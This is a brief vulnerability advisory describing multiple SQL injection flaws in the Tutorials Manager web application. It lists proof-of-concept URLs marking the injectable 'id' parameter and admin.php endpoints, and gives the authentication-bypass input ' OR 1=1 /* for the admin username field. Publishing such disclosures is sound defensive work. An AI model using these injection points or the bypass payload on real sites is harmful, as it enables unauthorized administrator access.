Tutorials Manager Multiple Remote SQL Injection Vulnerabilities

Tutorials Manager Multiple Remote SQL Injection Vulnerabilities

No exploit is required to leverage these issues. The following proof of concept has been provided:

http://www.example.com/guides/index.php?lang=0&CODE=02&id=1[SQL]
http://www.example.com/guides/index.php?lang=0&CODE=01&id=1[SQL]
http://www.example.com/guides/index.php?lang=0&CODE=14&id=1[SQL]
http://www.example.com/guides/admin.php?s=[SOMETHING]&act=own
http://www.example.com/sites/guides/admin.php?s=[SOMETHING]&act=admin&CODE=01

Passing the input ' OR 1=1 /* through the 'username' filed of the 'admin.php' script is reported to grant unauthorized administrator access to the affected application.